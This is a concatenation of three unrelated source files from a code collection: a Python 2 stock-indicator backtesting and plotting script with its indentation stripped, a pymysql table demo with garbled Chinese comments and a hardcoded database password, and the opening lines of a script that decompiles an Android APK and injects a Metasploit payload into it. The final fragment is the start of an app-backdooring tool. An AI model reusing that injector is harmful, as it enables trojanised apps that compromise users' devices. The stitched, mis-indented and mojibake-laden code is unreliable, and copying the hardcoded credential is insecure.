    n*(n+1)/2. (Despite the name, this is a weighted MA, not exponential.)
    Items may be numbers or numeric strings.
    """
    n = len(list)
    weighted = 0.0
    denom = 0
    for idx, v in enumerate(list):
        weighted += float(v) * (n - idx)
        denom += idx + 1
    return weighted / denom
response = urllib2.urlopen('http://table.finance.yahoo.com/table.csv?s='+name+'&d=12&e=29&f=3014&g='+period+'&a=3&b=23&c=1000&ignore=.csv')
if not os.path.exists( 'figures' ):
os.makedirs( 'figures' )
html = response.read()
#print html
a = html.split('\n')
dmax = len(a) - 2 #Be careful here! One header line and One empty line in the end
if ( dmax < time_range ):
time_range = dmax - 1
a200 = []
date200 = []
avg12 = []
avg26 = []
dif = []
TP = []
TR = []
TR14 = []
HighP = []
LowP = []
DM_positive = []
DM_negative = []
DM14_positive = []
DM14_negative = []
DI14_positive = []
DI14_negative = []
DX = []
ADX = []
for i in range(dmax, 0, -1):
date200.append(a[i].split(',')[0])
a200.append(float(a[i].split(',')[readinIndex]))
# HighP.append( float(a[i].split(',')[2]) )
HighP.append( float(a[i].split(',')[2]) / float(a[i].split(',')[4]) * float(a[i].split(',')[6]) )
# LowP.append( float(a[i].split(',')[3]) )
LowP.append( float(a[i].split(',')[3]) / float(a[i].split(',')[4]) * float(a[i].split(',')[6]) )
CloseP = float(a[i].split(',')[readinIndex])
TP.append( (HighP[dmax - i] + LowP[dmax - i] + CloseP) / 3.0 )
if ( i < dmax ):
TR.append( max(HighP[dmax - i], a200[dmax - i - 1]) - min(LowP[dmax - i], a200[dmax - i - 1]) )
TR14.append( TR14[dmax - i - 1] * float(DMI_period - 1) / float(DMI_period) + TR[dmax - i] / float(DMI_period) )
DM_positive.append( max(0, HighP[dmax - i] - HighP[dmax - i - 1]) )
DM_negative.append( max(0, LowP[dmax - i - 1] - LowP[dmax - i]) )
DM14_positive.append( DM14_positive[dmax - i - 1] * float(DMI_period - 1) / float(DMI_period) + DM_positive[dmax - i] / float(DMI_period) )
DM14_negative.append( DM14_negative[dmax - i - 1] * float(DMI_period - 1) / float(DMI_period) + DM_negative[dmax - i] / float(DMI_period) )
if ( TR14[dmax - i] == 0 ):
DI14_positive.append(0)
DI14_negative.append(0)
else:
DI14_positive.append( DM14_positive[dmax - i] / TR14[dmax - i] * 100 )
DI14_negative.append( DM14_negative[dmax - i] / TR14[dmax - i] * 100 )
if ( DI14_positive[dmax - i] + DI14_negative[dmax - i] == 0 ):
DX.append(0)
else:
DX.append( abs( DI14_positive[dmax - i] - DI14_negative[dmax - i] ) / ( DI14_positive[dmax - i] + DI14_negative[dmax - i] ) * 100 )
ADX.append( ADX[dmax - i - 1] * float(DMI_period - 1) / float(DMI_period) + DX[dmax - i] / float(DMI_period) )
else:
TR.append( HighP[dmax - i] - LowP[dmax - i] )
TR14.append( TR[dmax - i] )
DM_positive.append(0)
DM_negative.append(0)
DM14_positive.append( DM_positive[dmax - i] )
DM14_negative.append( DM_negative[dmax - i] )
if ( TR14[dmax - i] == 0 ):
DI14_positive.append(0)
DI14_negative.append(0)
else:
DI14_positive.append( DM14_positive[dmax - i] / TR14[dmax - i] * 100 )
DI14_negative.append( DM14_negative[dmax - i] / TR14[dmax - i] * 100 )
if ( DI14_positive[dmax - i] + DI14_negative[dmax - i] == 0 ):
DX.append(0)
else:
DX.append( abs( DI14_positive[dmax - i] - DI14_negative[dmax - i] ) / ( DI14_positive[dmax - i] + DI14_negative[dmax - i] ) * 100 )
ADX.append( DX[dmax - i] )
# print HighP, LowP, CloseP
#a200.reverse()
#date200.reverse()
#TP.reverse()
a300 = []
for i in range(0, len(a200) ):
a200[i] = float(a200[i])
#print max(a200)
EMA12 = a200[0]
EMA26 = a200[0]
DIF = 0.0
DEA_old = 0.0
DEA_new = 0.0
DIF_array = []
DEA_array = []
#print html
MA_array = []
CCI_array = []
figure(1,(12,15))
# CCI Part
for i in range(0, dmax):
if ( i < CCI_period - 1 ):
MA = Average( TP[:i+1] )
MA_array.append(MA)
# MD = Average( [abs(x - y) for x, y in zip(MA_array[:i+1], TP[:i+1])] )
MD = Average( [abs(x - MA) for x in TP[:i+1]] )
else:
MA = Average( TP[i-19:i+1] )
MA_array.append(MA)
# MD = Average( [abs(x - y) for x, y in zip(MA_array[i-19:i+1], TP[i-19:i+1])] )
MD = Average( [abs(x - MA) for x in TP[i-19:i+1]] )
if ( i < CCI_period - 1 ):
CCI_array.append(0)
else:
CCI_array.append ( ( TP[i] - MA ) / MD / 0.015 )
# print TP[i], MA
# MACD Part
for i in range(1, dmax):
EMA12 = ( 2 * float(a200[i]) + 11 * EMA12 ) / 13
EMA26 = ( 2 * float(a200[i]) + 25 * EMA26 ) / 27
DIF = EMA12 - EMA26
DEA_new = DEA_old * 8 / 10 + DIF * 2 / 10
DIF_array.append(DIF)
DEA_array.append(DEA_new)
DEA_old = DEA_new
x = arange(1, dmax, 1)
#print len(x)
#DIF_array = x
#plot(x[400:], DIF_array[400:], x[400:], DEA_array[400:])
subplot(nsubplots,1,iprice)
plot(x[dmax-time_range-1:]-(dmax-time_range-1), a200[dmax - time_range:], 'k')
grid(True)
xindex = []
xdate = []
xinterval = 5
for i in range( 0, xinterval ):
xindex.append( int ( math.ceil( float(i) * ( time_range - 1 ) / xinterval ) ) + 1 )
xdate.append( str( date200[dmax - 1 - time_range + int ( math.ceil( float(i) * ( time_range - 1 ) / xinterval ) ) + 1] ) )
xindex.append( time_range )
xdate.append( str( date200[dmax - 1] ) )
xticks(xindex, xdate)
ylabel('PRICE (USD)', fontsize=16)
title(name.upper() + ' Price and Indices in the past ' + str(time_range) + ' ' + periodText, fontsize = 18 )
# Plot CCI
#subplot(nsubplots,1,icci)
#plot(x[dmax-time_range-1:]-(dmax-time_range-1), CCI_array[dmax - time_range:], 'k')
#grid(True)
#xticks(xindex, xdate)
#ylabel('CCI_20', fontsize=16)
# Plot DMI
subplot(nsubplots,1,idmi)
plot(x[dmax-time_range-1:]-(dmax-time_range-1), DI14_positive[dmax - time_range:], 'b',linestyle=':')
plot(x[dmax-time_range-1:]-(dmax-time_range-1), DI14_negative[dmax - time_range:], 'm', linestyle='--')
#plot(x[dmax-time_range-1:]-(dmax-time_range-1), DX[dmax - time_range:], 'g')
plot(x[dmax-time_range-1:]-(dmax-time_range-1), ADX[dmax - time_range:], 'k', linestyle='-')
grid(True)
xticks(xindex, xdate)
ylabel('DMI_14', fontsize=16)
lg = legend(['DI+', 'DI-', 'ADX'], loc='upper center', bbox_to_anchor=(1.049, 1.05))
subplot(nsubplots,1,imacd)
plot(x[dmax-time_range-1:]-(dmax-time_range-1), DIF_array[dmax-time_range-1:], 'b')
plot(x[dmax-time_range-1:]-(dmax-time_range-1), DEA_array[dmax-time_range-1:], 'r')
#xlabel('Date', fontsize=16)
ylabel('MACD (USD)', fontsize=16)
globalmin = min([min(DIF_array[dmax-time_range-1:]), min(DEA_array[dmax-time_range-1:])])
globalmax = max([max(DIF_array[dmax-time_range-1:]), max(DEA_array[dmax-time_range-1:])])
#for j in range( 0, 5):
# text(time_range - j * xinterval - float(time_range) / 40.0, globalmin - (globalmax - globalmin) * 0.2, date200[dmax-1-j * xinterval],color='blue')
lg = legend(['DIF', 'MACD'], loc='upper center')
lg.draw_frame(False)
grid(True)
xticks(xindex, xdate)
#xticks([i * 5 for i in range(1, time_range / 5)])
#title('[12, 26, 9] MACD Curves for ' + name.upper() + ' in the recent ' + str(time_range) + ' ' + periodText )
if ( predict == True):
cash = 1.0
ns = 0
nborrow = 0
ntrade = 0
ngain = 0
nloss = 0
total_gain = 0.0
total_loss = 0.0
top = []
itop = []
bottom = []
ibottom = []
iabove = 1
ibelow = 1
imax = 1
maxd = -99999.0
imin = 1
mind = 99999.0
imaxprice = 1
maxprice = -99999.0
iminprice = 1
minprice = 99999.0
above_active = False
below_active = False
found_low_MACD = False
found_low_ADX = False
last_low_MACD = 0
last_low_ADX = 0
real_high = False
total_vector = []
gain_result_vector = []
for i in range( dmax - 1 - time_range, dmax - 1):
total = cash + ns * float(a200[i+1]) - nborrow * float(a200[i+1])
total_vector.append( total )
gain_result = 0.0
# print i, " ", a200[i+1], " ", total, date200[i+1]
correct = False
buy = False
sell = False
DIF_slope = DIF_array[i] - DIF_array[i-1]
DEA_slope = DEA_array[i] - DEA_array[i-1]
if ( DIF_array[i-1] < DEA_array[i-1] and DIF_array[i-2] > DIF_array[i-1] and DIF_array[i] > DIF_array[i-1] ):
found_low_MACD = True
last_low_MACD = i
if ( DIF_slope < 0 and DIF_array[i-1] > DEA_array[i-1] and DIF_array[i] < DEA_array[i] ):
sell = True
subplot(nsubplots,1,imacd)
axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='r',linestyle='dashed')
# Make decision based on CCI
# if ( CCI_array[i] < 100 and CCI_array[i+1] >= 100 ):
# buy = True
# subplot(nsubplots,1,icci)
# axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='g')
# if ( CCI_array[i] > -100 and CCI_array[i+1] <= -100 ):
# sell = True
# subplot(nsubplots,1,icci)
# axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='r',linestyle='dashed')
# Make decision based on DMI
if ( ADX[i+1] < ADX[i] and ADX[i-1] < ADX[i] ):
found_low_ADX = True
if ( i - last_low_MACD <= 3 ):
buy = True
subplot(nsubplots,1,imacd)
axvline(x = last_low_MACD - (dmax-time_range-1) + 1, linewidth=1, color='g')
subplot(nsubplots,1,idmi)
axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='g')
# if ( DI14_positive[i] > DI14_negative[i] and DI14_positive[i+1] < DI14_negative[i+1] and ADX[i+1] >= 25 ):
# sell = True
# subplot(nsubplots,1,idmi)
# axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='r',linestyle='dashed')
if ( buy ):
if ( nborrow > 0 ):
subplot(nsubplots,1,iprice)
axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='g')
ntrade = ntrade + 1
cash = cash - nborrow * float(a200[i+1])
if ( float(a200[i+1]) < borrow_price ):
ngain = ngain + 1
gain = nborrow * (borrow_price - float(a200[i+1]))
gain_result = gain
total_gain = total_gain + gain
# file.write(str(ntrade) + ' ' + str(gain) + '\n')
else:
nloss = nloss + 1
loss = nborrow * (borrow_price - float(a200[i+1]))
gain_result = loss
total_loss = total_loss + loss
# file.write(str(ntrade) + ' ' + str(loss) + '\n')
nborrow = 0
if ( ns == 0 ):
subplot(nsubplots,1,iprice)
axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='g')
# subplot(nsubplots,1,iprice)
# axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='g')
# subplot(nsubplots,1,icci)
# axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='g')
ns = cash / float(a200[i+1])
if ( ns > 0 ):
cash = cash - ns * float(a200[i+1])
buy_price = float(a200[i+1])
buy_date = i - (dmax-time_range-1) + 1
if ( sell ):
if ( ns > 0 ):
subplot(nsubplots,1,iprice)
axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='r',linestyle='dashed')
# subplot(nsubplots,1,iprice)
# axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='r',linestyle='dashed')
# subplot(nsubplots,1,icci)
# axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='r',linestyle='dashed')
# print 'Bought on ', date200[(dmax-time_range-1) + buy_date], ' @ ', buy_price, '; Sell on ', date200[i+1], ' @ ', a200[i+1]
ntrade = ntrade + 1
cash = cash + ns * float(a200[i+1])
if ( float(a200[i+1]) > buy_price ):
ngain = ngain + 1
gain = ns * (float(a200[i+1]) - buy_price)
gain_result = gain
total_gain = total_gain + gain
# file.write(str(ntrade) + ' ' + str(gain) + '\n')
else:
nloss = nloss + 1
loss = ns * (float(a200[i+1]) - buy_price)
gain_result = loss
total_loss = total_loss + loss
# file.write(str(ntrade) + ' ' + str(loss) + '\n')
ns = 0
if ( nborrow == 0 ):
subplot(nsubplots,1,iprice)
axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='r',linestyle='dashed')
# subplot(nsubplots,1,iprice)
# axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='r',linestyle='dashed')
# subplot(nsubplots,1,icci)
# axvline(x = i - (dmax-time_range-1) + 1, linewidth=1, color='r',linestyle='dashed')
nborrow = cash / float(a200[i+1])
if ( nborrow > 0 ):
cash = cash + nborrow * float(a200[i+1])
borrow_price = float(a200[i+1])
borrow_date = i - (dmax-time_range-1) + 1
gain_result_vector.append( gain_result )
# file.close()
ref_total = 1.0 / float(a200[dmax - 1 - time_range + 1]) * (-float(a200[dmax - 1 - time_range + 1]) + float(a200[dmax - 1])) + 1.0
if ( ngain == 0 ):
avg_gain = 'NA'
else:
avg_gain = total_gain / ngain
if ( nloss == 0 ):
avg_loss = 'NA'
else:
avg_loss = total_loss / nloss
print ntrade, ' ', ngain, ' ', nloss, ' ', avg_gain, ' ', avg_loss, total, ref_total, (total-ref_total)/ref_total*100
#figure()
x = arange(1, time_range + 1, 1)
subplot(nsubplots,1,ibalance)
xlim([1,time_range])
plot( x, total_vector )
#title(name.upper() + ' Balance and Gain/Loss in the past ' + str(time_range) + ' ' + periodText, fontsize = 18 )
xindex = []
xdate = []
xinterval = 5
for i in range( 0, xinterval ):
xindex.append( int ( math.ceil( float(i) * ( time_range - 1 ) / xinterval ) ) + 1 )
# print int ( math.ceil( float(i) * ( time_range - 1 ) / xinterval ) )
xdate.append( str( date200[dmax - 1 - time_range + int ( math.ceil( float(i) * ( time_range - 1 ) / xinterval ) ) + 1] ) )
xindex.append( time_range )
xdate.append( str( date200[dmax - 1] ) )
xticks(xindex, xdate, fontsize=12)
ylabel('Balance (USD)', fontsize=16)
grid(True)
subplot(nsubplots,1,igain)
xlim([1,time_range])
vlines( x, [0], gain_result_vector, lw=4 )
axhline(0, color='black')
xticks(xindex, xdate, fontsize=12)
xlabel('Date', fontsize=16)
ylabel('Gain (USD)', fontsize=16)
grid(True)
#figure()
#x = arange(1, time_range + 1, 1)
#subplot(nsubplots,1,3)
#xlim([1,time_range])
#plot( x, total_vector )
#title(name.upper() + ' Balance and Gain/Loss in the past ' + str(time_range) + ' ' + periodText, fontsize = 18 )
#xindex = []
#xdate = []
#xinterval = 5
#for i in range( 0, xinterval ):
# xindex.append( int ( math.ceil( float(i) * ( time_range - 1 ) / xinterval ) ) + 1 )
# print int ( math.ceil( float(i) * ( time_range - 1 ) / xinterval ) )
# xdate.append( str( date200[dmax - 1 - time_range + int ( math.ceil( float(i) * ( time_range - 1 ) / xinterval ) ) + 1] ) )
#xindex.append( time_range )
#xdate.append( str( date200[dmax - 1] ) )
#xticks(xindex, xdate, fontsize=12)
#ylabel('Balance (USD)', fontsize=16)
#grid(True)
#subplot(nsubplots,1,4)
#xlim([1,time_range])
#vlines( x, [0], gain_result_vector, lw=4 )
#axhline(0, color='black')
#xticks(xindex, xdate, fontsize=12)
#xlabel('Date', fontsize=16)
#ylabel('Gain (USD)', fontsize=16)
#grid(True)
savefig( './figures/' + name.upper() + '_' + periodText + '.pdf' )
|
434 | 75133dd924f8f3f028075c5d2109bb79ddc7fe87 | import pymysql
def testeSelect(db):
    """Smoke-test the connection by printing the MySQL server version.

    db: an open pymysql connection.
    """
    # Create a cursor for the query
    cur1 = db.cursor()
    # Execute the SQL query with execute()
    cur1.execute("SELECT VERSION()")
    # Fetch a single result row with fetchone()
    data = cur1.fetchone()
    print(dir(data))  # NOTE(review): debug output — consider removing
    print ("cur1 : %s " % cur1)
    print ("Database version : %s " % data)
def dropTable(db):
    """Drop the python_demo table if it exists.

    db: an open pymysql connection.
    """
    # Create a cursor for the statement
    cur1 = db.cursor()
    cur1.execute("drop table if exists python_demo")
    print('dropTable',cur1)
def createTable(db):
#ๅๅปบๆฅ่ฏขๆธธๆ
cur1 = db.cursor()
sql = '''
CREATE TABLE IF NOT EXISTS python_demo (
MEMBER_ID INT(20) NOT NULL AUTO_INCREMENT COMMENT 'ไผๅID',
MEMBER_CODE VARCHAR(20) NOT NULL COMMENT 'ไผๅไปฃ็ ',
MEMBER_NAME VARCHAR(128) NOT NULL COMMENT 'ๅ
ฌๅธไธญๆๅ็งฐ',
MEMBER_NAME_SHORT VARCHAR(128) NULL DEFAULT NULL COMMENT 'ๅ
ฌๅธ็ฎ็งฐ',
COMPANY_NAME_EN VARCHAR(128) NULL DEFAULT NULL COMMENT 'ๅ
ฌๅธ่ฑๆๅ็งฐ',
REG_PLACE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅ
ฌๅธๆณจๅๅฐๅ',
REG_ADDRESS VARCHAR(128) NULL DEFAULT NULL COMMENT 'ๅ
ฌๅธๆณจๅๅฐๅ',
ENT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅ
ฌๅธๆง่ดจ',
REGCAPITAL DOUBLE(12,2) NULL DEFAULT NULL COMMENT 'ๆณจๅ่ตๆฌ',
REG_CURRENCY VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๆณจๅ่ตๆฌๅธ็ง',
JUDICIAL_PERSON VARCHAR(32) NULL DEFAULT NULL COMMENT 'ๆณไบบๅ็งฐ',
BUSINESS_SCOPE VARCHAR(128) NULL DEFAULT NULL COMMENT 'ๅ
ฌๅธ็ป่ฅ่ๅด',
COM_TEL VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅ
ฌๅธ็ต่ฏ',
COM_FAX VARCHAR(64) NULL DEFAULT NULL COMMENT 'ๅ
ฌๅธไผ ็',
PERSON_INCHARGE VARCHAR(64) NULL DEFAULT NULL COMMENT 'ๅ
ฌๅธ่ด่ดฃไบบ',
ZIP_CODE VARCHAR(6) NULL DEFAULT NULL COMMENT '้ฎ็ผ',
CON_NAME VARCHAR(32) NULL DEFAULT NULL COMMENT '่็ณปไบบๅงๅ',
CON_MOBILE VARCHAR(20) NULL DEFAULT NULL COMMENT '่็ณปไบบๆๆบ',
CON_EMAIL VARCHAR(32) NULL DEFAULT NULL COMMENT '่็ณปไบบ้ฎ็ฎฑ',
CON_FAX VARCHAR(32) NULL DEFAULT NULL COMMENT '่็ณปไบบไผ ็',
CON_CERT_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT '่็ณปไบบ่ฏไปถ็ฑปๅ',
CON_CERT_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '่็ณปไบบ่ฏไปถๅท',
CON_CERT_DATE DATE NULL DEFAULT NULL COMMENT '่็ณปไบบ่ฏไปถๅคฑๆๆถ้ด',
CON_CER1_ID INT(20) NULL DEFAULT NULL COMMENT '่็ณปไบบ่บซไปฝ่ฏๆญฃ้ขID',
CON_CER2_ID INT(20) NULL DEFAULT NULL COMMENT '่็ณปไบบ่บซไปฝ่ฏๅ้ขID',
THERECER_INTGRATED VARCHAR(20) NULL DEFAULT NULL COMMENT 'ไธ่ฏๅไธๆ ๅฟ',
BIZLIC_ID INT(20) NULL DEFAULT NULL COMMENT '่ฅไธๆง็
งID',
BIZLIC_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '่ฅไธๆง็
งไปฃ็ ',
BIZLIC_DATE DATE NULL DEFAULT NULL COMMENT '่ฅไธๆง็
งๅคฑๆๆถ้ด',
TAXREGISTER_ID INT(20) NULL DEFAULT NULL COMMENT '็จๅก็ญ็บง่ฏไนฆID',
TAXREGISTER_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '็จๅก็ป่ฎฐๅท',
TAXREGISTER_DATE DATE NULL DEFAULT NULL COMMENT '็จๅก็ป่ฎฐๅคฑๆๆถ้ด',
ORGREG_ID INT(20) NULL DEFAULT NULL COMMENT '็ป็ปๆบๆไปฃ็ ่ฏID',
ORGREG_NO VARCHAR(20) NULL DEFAULT NULL COMMENT '็ป็ปๆบๆไปฃ็ ',
ORGREG_DATE DATE NULL DEFAULT NULL COMMENT '็ป็ปๆบๆๅคฑๆๆถ้ด',
BANK_ID INT(20) NULL DEFAULT NULL COMMENT '้ถ่กๅผๆท่ฎธๅฏ่ฏID',
BANK_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅผๆท้ถ่ก็ฑปๅซ',
BANK_DEPOSIT VARCHAR(128) NULL DEFAULT NULL COMMENT 'ๅผๆท้ถ่ก',
BANK_DEPOSIT_CODE VARCHAR(32) NULL DEFAULT NULL COMMENT 'ๅผๆท้ถ่ก็ผ็ ',
BANK_ACCOUNTNO VARCHAR(32) NULL DEFAULT NULL COMMENT '้ถ่ก่ดฆๅท',
BANK_HOUSEHOULD VARCHAR(32) NULL DEFAULT NULL COMMENT '้ถ่กๆทไธป',
INVOICE_TITLE VARCHAR(128) NULL DEFAULT NULL COMMENT 'ๅผ็ฅจๅฐๅคด',
INVOICE_ADDRESS VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅผ็ฅจๅฐๅ',
INVOICE_ADDRESS_DT VARCHAR(128) NULL DEFAULT NULL COMMENT 'ๅผ็ฅจ่ฏฆ็ปๅฐๅ',
APPLY_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT '็ณ่ฏทๅฎกๆ ธๆบๆ',
BUYER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT 'ไนฐๅฎถๆ ่ฏ',
SELLER_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅๅฎถๆ ่ฏ',
THIRD_PART_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT '็ฌฌไธๆนๆ ่ฏ',
MAIN_USER_ID INT(20) NULL DEFAULT NULL COMMENT 'ไธป่ดฆๅทID',
MDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDMไธปๆฐๆฎCODE',
ERP_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ERPไผๅCODE',
REG_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๆณจๅ็ฑปๅ',
STATUS VARCHAR(20) NULL DEFAULT NULL COMMENT 'ไผๅ็ถๆ',
AUDITOR VARCHAR(128) NULL DEFAULT NULL COMMENT 'ๅฎกๆ ธไบบ',
AUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT 'ๅฎกๆ ธๆถ้ด',
AUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅฎกๆ ธ็ปๆ',
AUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT 'ๅฎกๆ ธๆ่ง',
MDM_AUDITOR VARCHAR(32) NULL DEFAULT NULL COMMENT 'MDMๅฎกๆ ธไบบ',
MDM_AUDIT_DATE DATETIME NULL DEFAULT NULL COMMENT 'MDMๅฎกๆ ธๆถ้ด',
MDM_AUDIT_OPINION VARCHAR(128) NULL DEFAULT NULL COMMENT 'MDMๅฎกๆ ธๆ่ง',
MDM_AUDIT_RESULT VARCHAR(20) NULL DEFAULT NULL COMMENT 'MDMๅฎกๆ ธ็ปๆ',
MEMBER_CHG_ID INT(20) NULL DEFAULT NULL COMMENT 'ๅๆดID',
CHANGE_STATUS VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅๆด็ถๆ',
ALIVE_FLAG VARCHAR(1) NOT NULL COMMENT 'ๅฝๅๆๆ็ถๆ',
LANG_VER VARCHAR(10) NULL DEFAULT NULL COMMENT '่ฏญ่จ็ฑปๅ',
CREATE_USER INT(20) NOT NULL COMMENT 'ๅๅปบ่
',
CREATE_DATE DATETIME NOT NULL COMMENT 'ๅๅปบๆถ้ด',
UPDATE_USER INT(20) NULL DEFAULT NULL COMMENT 'ไฟฎๆน่
',
UPDATE_DATE DATETIME NULL DEFAULT NULL COMMENT 'ไฟฎๆนๆถ้ด',
DELETE_USER INT(20) NULL DEFAULT NULL COMMENT 'ๅ ้ค่
',
DELETE_DATE DATETIME NULL DEFAULT NULL COMMENT 'ๅ ้คๆถ้ด',
BUYER_TYPE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ไนฐๅฎถ็ฑปๅ(01๏ผไธชไบบไนฐๅฎถ๏ผ02๏ผๅ
ฌๅธไนฐๅฎถ)',
AUDIT_OPTION_FLAG VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅฎกๆ ธ่บซไปฝๆ ่ฏ(01๏ผๅนณๅฐ๏ผ02๏ผๅๅฎถ)',
AUDIT_SELLER_ID INT(20) NULL DEFAULT NULL COMMENT 'ๅฎกๆ ธๅๅฎถID(ๅฝๅฎกๆ ธ่บซไปฝๆ ่ฏไธบๅๅฎถๅฎกๆ ธๆถ๏ผๅฎกๆ ธ็ๅๅฎถID)',
SELLER_MDM VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅๅฎถMDM็ณป็ป',
SELLER_SAP VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅๅฎถSAP็ณป็ป',
SELLER_MDM_DATA_CODE VARCHAR(20) NULL DEFAULT NULL COMMENT 'ๅๅฎถMDM็ณป็ปๆฐๆฎCODE',
IS_PLAT_BLACK VARCHAR(2) NULL DEFAULT NULL COMMENT '้ปๅๅ็ถๆ(41๏ผๆฏ๏ผ0๏ผๅฆ)',
INVOCIE_ADDRESS_LEFT3 VARCHAR(10) NULL DEFAULT NULL COMMENT '็จๆทๆๅฑๅบๅ-็',
INVOCIE_ADDRESS_RIGHT5 VARCHAR(10) NULL DEFAULT NULL COMMENT '็จๆทๆๅฑๅบๅ-ๅธ',
PRIMARY KEY (MEMBER_ID)
)
COMMENT='ไผๅไฟกๆฏ่กจ'
COLLATE='utf8_general_ci'
ENGINE=InnoDB
'''
cur1.execute(sql)
print('createTabl',cur1)
def selectTable(db):
    """Print up to 10 rows (name, code, id) from python_demo.

    db: an open pymysql connection.
    """
    # Create a cursor for the query
    cur1 = db.cursor()
    cur1.execute("select member_name,MEMBER_CODE,member_id from python_demo limit 10")
    # Fetch all result rows with fetchall()
    data = cur1.fetchall()
    for index,item in enumerate(data):
        # Row number first, then each column value, space-separated
        print(index,sep=' ', end=' ')
        for index2,item2 in enumerate(item):
            print(item2,sep=' ', end=' ')
        print("")
def insertTable(db):
#ๅๅปบๆฅ่ฏขๆธธๆ
cur1 = db.cursor()
cur1.execute("INSERT INTO python_demo (MEMBER_CODE, MEMBER_NAME, MEMBER_NAME_SHORT, COMPANY_NAME_EN, REG_PLACE, REG_ADDRESS, ENT_TYPE, REGCAPITAL, REG_CURRENCY, JUDICIAL_PERSON, BUSINESS_SCOPE, COM_TEL, COM_FAX, PERSON_INCHARGE, ZIP_CODE, CON_NAME, CON_MOBILE, CON_EMAIL, CON_FAX, CON_CERT_TYPE, CON_CERT_NO, CON_CERT_DATE, CON_CER1_ID, CON_CER2_ID, THERECER_INTGRATED, BIZLIC_ID, BIZLIC_NO, BIZLIC_DATE, TAXREGISTER_ID, TAXREGISTER_NO, TAXREGISTER_DATE, ORGREG_ID, ORGREG_NO, ORGREG_DATE, BANK_ID, BANK_TYPE, BANK_DEPOSIT, BANK_DEPOSIT_CODE, BANK_ACCOUNTNO, BANK_HOUSEHOULD, INVOICE_TITLE, INVOICE_ADDRESS, INVOICE_ADDRESS_DT, APPLY_SELLER_ID, BUYER_FLAG, SELLER_FLAG, THIRD_PART_FLAG, MAIN_USER_ID, MDM_DATA_CODE, ERP_DATA_CODE, REG_TYPE, STATUS, AUDITOR, AUDIT_DATE, AUDIT_RESULT, AUDIT_OPINION, MDM_AUDITOR, MDM_AUDIT_DATE, MDM_AUDIT_OPINION, MDM_AUDIT_RESULT, MEMBER_CHG_ID, CHANGE_STATUS, ALIVE_FLAG, LANG_VER, CREATE_USER, CREATE_DATE, UPDATE_USER, UPDATE_DATE, DELETE_USER, DELETE_DATE, BUYER_TYPE, AUDIT_OPTION_FLAG, AUDIT_SELLER_ID, SELLER_MDM, SELLER_SAP, SELLER_MDM_DATA_CODE, IS_PLAT_BLACK, INVOCIE_ADDRESS_LEFT3, INVOCIE_ADDRESS_RIGHT5) VALUES ('A000001', 'ไธญๅฝๆ้ๅ
ฌๅธ', 'ไธญๅฝๆ้ๅ
ฌๅธ', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'xinming', '15136378930', NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '0', '1', '0', 2, 'M0000001', '00M0000001', '10', '01', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 2, '01', '1', 'ZH-CN', 179143, '2016-05-28 12:16:23', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL)")
# ไฝฟ็จ fetchall() ๆฅๆถๅ
จ้จ็่ฟๅ็ปๆ่ก
#data = cur1.rowcount()
#print('insertTable',data)
# ๆๅผๆฐๆฎๅบ่ฟๆฅ
db = pymysql.connect(host='127.0.0.1',user='pu3147',
password='1qaz@WSX',database='demo',port=3306,charset='UTF8')
dropTable(db)
createTable(db)
insertTable(db)
insertTable(db)
insertTable(db)
insertTable(db)
insertTable(db)
testeSelect(db)
selectTable(db)
# ๅ
ณ้ญๆฐๆฎๅบ่ฟๆฅ
db.close()
|
435 | fcc73647a5e841bcb5ea4fcd06579cc6912cfe1e | #!/usr/bin/env python
import os
import re
import pycolor
import sys
pyc = pycolor.pyColor()
def decompile(mainapk):
print pyc.Info("Decompiling apks...")
os.system("bash apktool.sh d -f %s"%mainapk)
os.system("bash apktool.sh d -f temp.apk")
def inject(mainapk):
print pyc.Info("Injecting payload...")
mk = "mkdir %s/smali/com/metasploit"%mainapk.split('.')[0]
os.system(mk)
mk = "mkdir %s/smali/com/metasploit/stage"%mainapk.split('.')[0]
os.system(mk)
